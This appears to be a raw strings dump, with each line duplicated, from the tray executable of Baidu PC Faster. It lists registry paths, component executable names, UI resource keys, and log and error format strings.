Software\Microsoft\Windows\CurrentVersion\Uninstall\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
AndroidStore.exe
AndroidStore.exe
user_plugin_chrome_list
user_plugin_chrome_list
user_plugin_firefox_list
user_plugin_firefox_list
dir.ini
dir.ini
\Baidu Security\PC Faster\4.0.0.0
\Baidu Security\PC Faster\4.0.0.0
url.ini
url.ini
%d:%d,%d:%d
%d:%d,%d:%d
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
PCFaster.exe
PCFaster.exe
\sysconfig.ini
\sysconfig.ini
config.ini
config.ini
MainExeName
MainExeName
C:\Users\Public\Documents\Baidu Security\PC Faster\4.0.0.0
C:\Users\Public\Documents\Baidu Security\PC Faster\4.0.0.0
"%s" %s
"%s" %s
Sensapi.dll
Sensapi.dll
BugReporter.exe
BugReporter.exe
d-d-d d:d:d
d-d-d d:d:d
Unknown error X
Unknown error X
AcOnline = %d, LifePercent = %u, LifeTime = %u
AcOnline = %d, LifePercent = %u, LifeTime = %u
COMM_FUNC::GetAppDataDir, user_info::UniqueUserID::GetActiveDesktopToken()=%u
COMM_FUNC::GetAppDataDir, user_info::UniqueUserID::GetActiveDesktopToken()=%u
COMM_FUNC::GetAppDataDir, SHGetFolderPath(%d)=%u
COMM_FUNC::GetAppDataDir, SHGetFolderPath(%d)=%u
COMM_FUNC::GetAppDataDir, SHGetSpecialFolderPath(%d)
COMM_FUNC::GetAppDataDir, SHGetSpecialFolderPath(%d)
CWMIQuery::WMIQuery, Failed to initialize COM library. Error code = 0xx
CWMIQuery::WMIQuery, Failed to initialize COM library. Error code = 0xx
CWMIQuery::WMIQuery, Failed to initialize security. Error code = 0xx
CWMIQuery::WMIQuery, Failed to initialize security. Error code = 0xx
CWMIQuery::WMIQuery, Failed to create IWbemLocator object. Err code = 0xx
CWMIQuery::WMIQuery, Failed to create IWbemLocator object. Err code = 0xx
CWMIQuery::WMIQuery, Could not connect. Error code = 0xx
CWMIQuery::WMIQuery, Could not connect. Error code = 0xx
CWMIQuery::WMIQuery, Could not set proxy blanket. Error code = 0xx
CWMIQuery::WMIQuery, Could not set proxy blanket. Error code = 0xx
LCWMIQuery::WMIQuery, Query for Win32_QuickFixEngineering failed. Error code = 0xx
LCWMIQuery::WMIQuery, Query for Win32_QuickFixEngineering failed. Error code = 0xx
Baidu PC Faster Deep Optimization_{PCFaster_4.0.0.0}
Baidu PC Faster Deep Optimization_{PCFaster_4.0.0.0}
DeepOptimization.exe
DeepOptimization.exe
Baidu PC Faster Leak Reapir_{PCFaster_4.0.0.0}
Baidu PC Faster Leak Reapir_{PCFaster_4.0.0.0}
LeakRepairTool.exe
LeakRepairTool.exe
Baidu PC Faster Deep Clean_{PCFaster_4.0.0.0}
Baidu PC Faster Deep Clean_{PCFaster_4.0.0.0}
DeepClean.exe
DeepClean.exe
Baidu PC Faster Disk Defrag_{PCFaster_4.0.0.0}
Baidu PC Faster Disk Defrag_{PCFaster_4.0.0.0}
DiskDefrag.exe
DiskDefrag.exe
Baidu PC Faster BigFileCleaner_{PCFaster_4.0.0.0}
Baidu PC Faster BigFileCleaner_{PCFaster_4.0.0.0}
LargeFilesCleaner.exe
LargeFilesCleaner.exe
Baidu PC Faster BatteryDoctor_{PCFaster_4.0.0.0}
Baidu PC Faster BatteryDoctor_{PCFaster_4.0.0.0}
PowerMaster.exe
PowerMaster.exe
popuptip.exe
popuptip.exe
Baidu PC Faster WifiSharing_{PCFaster_4.0.0.0}
Baidu PC Faster WifiSharing_{PCFaster_4.0.0.0}
WifiHotspot.exe
WifiHotspot.exe
Baidu PC Faster PopupTip_{PCFaster_4.0.0.0}
Baidu PC Faster PopupTip_{PCFaster_4.0.0.0}
Baidu PC Faster Feedback_{PCFaster_4.0.0.0}
Baidu PC Faster Feedback_{PCFaster_4.0.0.0}
PCFasterFeedback.exe
PCFasterFeedback.exe
Baidu PC Faster Gamefaster_{PCFaster_4.0.0.0}
Baidu PC Faster Gamefaster_{PCFaster_4.0.0.0}
GameFaster.exe
GameFaster.exe
Baidu PC Faster IEProtect_{PCFaster_4.0.0.0}
Baidu PC Faster IEProtect_{PCFaster_4.0.0.0}
IEProtect.exe
IEProtect.exe
Baidu PC Faster FasterNow_{PCFaster_4.0.0.0}
Baidu PC Faster FasterNow_{PCFaster_4.0.0.0}
FasterNow.exe
FasterNow.exe
Baidu PC Faster Flash Repair_{PCFaster_4.0.0.0}
Baidu PC Faster Flash Repair_{PCFaster_4.0.0.0}
FlashPlayerRepair.exe
FlashPlayerRepair.exe
LSPRepair.exe
LSPRepair.exe
Baidu PC Faster Layer Service Provider Repair_{PCFaster_4.0.0.0}
Baidu PC Faster Layer Service Provider Repair_{PCFaster_4.0.0.0}
Baidu PC Faster Network Repair_{PCFaster_4.0.0.0}
Baidu PC Faster Network Repair_{PCFaster_4.0.0.0}
InternetRepair.exe
InternetRepair.exe
Baidu PC Faster Facebook Repair_{PCFaster_4.0.0.0}
Baidu PC Faster Facebook Repair_{PCFaster_4.0.0.0}
FacebookRepair.exe
FacebookRepair.exe
Baidu PC Faster Network Speed Tester_{PCFaster_4.0.0.0}
Baidu PC Faster Network Speed Tester_{PCFaster_4.0.0.0}
InternetSpeedTest.exe
InternetSpeedTest.exe
FileRecovery.exe
FileRecovery.exe
Baidu PC Faster File Recovery_{PCFaster_4.0.0.0}
Baidu PC Faster File Recovery_{PCFaster_4.0.0.0}
Baidu PC Faster File fred_{PCFaster_4.0.0.0}
Baidu PC Faster File fred_{PCFaster_4.0.0.0}
FileShredder.exe
FileShredder.exe
Baidu PC Faster Default Programs Setting_{PCFaster_4.0.0.0}
Baidu PC Faster Default Programs Setting_{PCFaster_4.0.0.0}
DefaultPrograms.exe
DefaultPrograms.exe
Baidu PC Faster Extension Mgr_{PCFaster_4.0.0.0}
Baidu PC Faster Extension Mgr_{PCFaster_4.0.0.0}
Right-ClickMenuManager.exe
Right-ClickMenuManager.exe
Baidu PC Faster Desktop Assistant_{PCFaster_4.0.0.0}
Baidu PC Faster Desktop Assistant_{PCFaster_4.0.0.0}
DesktopCleaner.exe
DesktopCleaner.exe
Baidu PC Faster System Info_{PCFaster_4.0.0.0}
Baidu PC Faster System Info_{PCFaster_4.0.0.0}
SystemInformation.exe
SystemInformation.exe
/language=%s
/language=%s
Name%d
Name%d
SoftwareToReport
SoftwareToReport
Chrome
Chrome
chrome
chrome
Firefox
Firefox
firefox
firefox
Opera
Opera
opera
opera
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
HTTP\shell\open\command
HTTP\shell\open\command
pathToSignedProductExe
pathToSignedProductExe
Baidu PC Faster Tray_{PCFaster_4.0.0.0}_PopMenu
Baidu PC Faster Tray_{PCFaster_4.0.0.0}_PopMenu
mainFrame.popup.menu
mainFrame.popup.menu
layout.battery
layout.battery
btn.fasterNow
btn.fasterNow
stt.battery.text.main
stt.battery.text.main
btn.exit
btn.exit
btn.open
btn.open
btn.junkClean
btn.junkClean
btn.gameFaster
btn.gameFaster
btn.battery
btn.battery
btn.wifi
btn.wifi
btn.feedBack
btn.feedBack
btn.about
btn.about
menu_item_batterudoctor_power_5_%d
menu_item_batterudoctor_power_5_%d
menu_item_batterudoctor_battery_5_%d
menu_item_batterudoctor_battery_5_%d
stt.battery.ico
stt.battery.ico
stt.battery.text.info
stt.battery.text.info
stt.wifi.ico
stt.wifi.ico
stt.wifi.text.info
stt.wifi.text.info
user32.dll
user32.dll
[TrayWnd] ReleaseMutex error: %x
[TrayWnd] ReleaseMutex error: %x
Baidu PC Faster Tray_{PCFaster_4.0.0.0}
Baidu PC Faster Tray_{PCFaster_4.0.0.0}
Baidu PC Fatser Tray Mutex_{PCFaster_4.0.0.0}
Baidu PC Fatser Tray Mutex_{PCFaster_4.0.0.0}
[TrayWnd] CreateMutex error: %d
[TrayWnd] CreateMutex error: %d
[MainFrame] Failed to call CreateFileMapping, ErrorCode:%x
[MainFrame] Failed to call CreateFileMapping, ErrorCode:%x
[Main Frame] Failed to call MapViewOfFile, ErrorCode:%x
[Main Frame] Failed to call MapViewOfFile, ErrorCode:%x
PCFasterSvc.exe
PCFasterSvc.exe
TRAY_RUN_TRACE: %.2d-%.2d %.2d:%.2d:%.2d Parent:%s CmdLine:%s
TRAY_RUN_TRACE: %.2d-%.2d %.2d:%.2d:%.2d Parent:%s CmdLine:%s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
CMyRegKeyBase::Open, m_mapRegKey.find(%s)
CMyRegKeyBase::Open, m_mapRegKey.find(%s)
CMyRegKeyBase::EqualType, m_mapRegType.find(%s)
CMyRegKeyBase::EqualType, m_mapRegType.find(%s)
\tooluserinfo.ini
\tooluserinfo.ini
Received popups function call message : lParam = %d
Received popups function call message : lParam = %d
PCFaster.lnk
PCFaster.lnk
: 0x%x
: 0x%x
skin\common\common.bskin
skin\common\common.bskin
skin\PcfTray\PcfTray.bskin
skin\PcfTray\PcfTray.bskin
DumpReportInterval
DumpReportInterval
dynamic\data.bns
dynamic\data.bns
Baidu PC Faster_{PCFaster_4.0.0.0}
Baidu PC Faster_{PCFaster_4.0.0.0}
PCFPopups.exe
PCFPopups.exe
-pushmsgDlg
-pushmsgDlg
UpLoadReportErrorDmp
UpLoadReportErrorDmp
CloudOPTClient.exe
CloudOPTClient.exe
%s|%s
%s|%s
TRAY_RUN_TRACE:TRAY::DoCmdLine->%s,
TRAY_RUN_TRACE:TRAY::DoCmdLine->%s,
SdkConfig.ini
SdkConfig.ini
\PcfTray\PcfTray.bskin
\PcfTray\PcfTray.bskin
-ShowPlugin %u %u
-ShowPlugin %u %u
Windows Defender
Windows Defender
%d|%d
%d|%d
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\TrayIcon
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\TrayIcon
TrayIcon loading result code: %x
TrayIcon loading result code: %x
Failed to add TrayIcon,last error code: %x
Failed to add TrayIcon,last error code: %x
Failed to delete TrayIcon,last error code: %x
Failed to delete TrayIcon,last error code: %x
Default.bskin
Default.bskin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
\skin\skin_default\skin_default.bskin
\skin\skin_default\skin_default.bskin
dwmapi.dll
dwmapi.dll
skin\Scattered\MainFrame\shadow.png
skin\Scattered\MainFrame\shadow.png
mainFrame.confirmexit
mainFrame.confirmexit
mainFrame.confirmexit.orange
mainFrame.confirmexit.orange
static.msg2
static.msg2
dlg.tip.confirmexit
dlg.tip.confirmexit
mainFrame.autostart.dlg
mainFrame.autostart.dlg
static.msg
static.msg
btn.ok
btn.ok
btn.cancel
btn.cancel
btn.neverAsk
btn.neverAsk
mainFrame.fasternow.exit
mainFrame.fasternow.exit
popup.fasternow.close
popup.fasternow.close
mainFrame.popup.battery
mainFrame.popup.battery
Failed to MapViewOfFile of %s (error=%d)
Failed to MapViewOfFile of %s (error=%d)
Failed to OpenFileMapping of %s (error=%d)
Failed to OpenFileMapping of %s (error=%d)
@HKEY_CURRENT_CONFIG
@HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
%u.u.u.u
%u.u.u.u
version.xml
version.xml
Uninstall.exe
Uninstall.exe
ReportURL
ReportURL
DataReport
DataReport
%Program Files%\Baidu Security\PC Faster\5.0.0.0\
%Program Files%\Baidu Security\PC Faster\5.0.0.0\
5.0.4.87531
5.0.4.87531
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump
5.1.2600.5512 (xpsp.080413-211
5.1.2600.5512 (xpsp.080413-211
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe
5,0,4,87360
5,0,4,87360
PCFTray.exe_2564_rwx_00545000_00001000:
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe